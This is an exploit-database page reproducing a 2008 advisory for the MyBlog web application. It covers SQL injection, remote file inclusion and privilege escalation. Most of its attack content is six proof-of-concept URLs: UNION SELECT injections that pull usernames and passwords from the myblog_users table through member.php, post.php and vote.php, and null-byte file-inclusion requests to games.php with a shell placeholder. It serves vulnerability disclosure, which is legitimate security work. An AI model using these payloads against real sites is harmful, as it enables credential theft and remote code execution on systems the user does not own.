header-logo
Suggest Exploit
vendor:
MyBlog
by:
SecurityFocus
7.5
CVSS
HIGH
Multiple SQL-injection vulnerabilities, Multiple remote file-include vulnerabilities, Privilege-escalation vulnerability
89, 94, 264
CWE
Product Name: MyBlog
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

MyBlog Multiple Input Validation Vulnerabilities

An attacker may exploit these issues to compromise the affected application, execute arbitrary script code in the context of the webserver process, or pass malicious input to database queries, resulting in the modification of query logic or other attacks.

Mitigation:

Input validation should be used to prevent malicious input from entering the system. Additionally, access to privileged functions should be restricted to authorized personnel only.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/28313/info

MyBlog is prone to multiple input-validation vulnerabilities, including:

- Multiple SQL-injection vulnerabilities
- Multiple remote file-include vulnerabilities
- A privilege-escalation vulnerability

An attacker may exploit these issues to compromise the affected application, execute arbitrary script code in the context of the webserver process, or pass malicious input to database queries, resulting in the modification of query logic or other attacks. 

http://www.example.com/path/member.php?id='+union+select+password,2,3,4,5,6,7,8,9,10+from+myblog_users+/*
http://www.example.com/path/post.php?id='+union+select+2,3,user,password,6,7,8,9,10,11,12+from+myblog_users/*
http://www.example.com/path/vote.php?id='+union+select+password,3,4,5,6,7,8,9,10,11,12+from+myblog_users+/*
http://www.example.com/path/vote.php?mid='+union+select+password,3,4,5,6,7,8,9,10+from+myblog_users+/*
http://www.example.com/path/games.php?id=[shell]%00
http://www.example.com/path/games.php?scoreid=[shell]%00

Navigation

Suggest Exploit

Services By CQR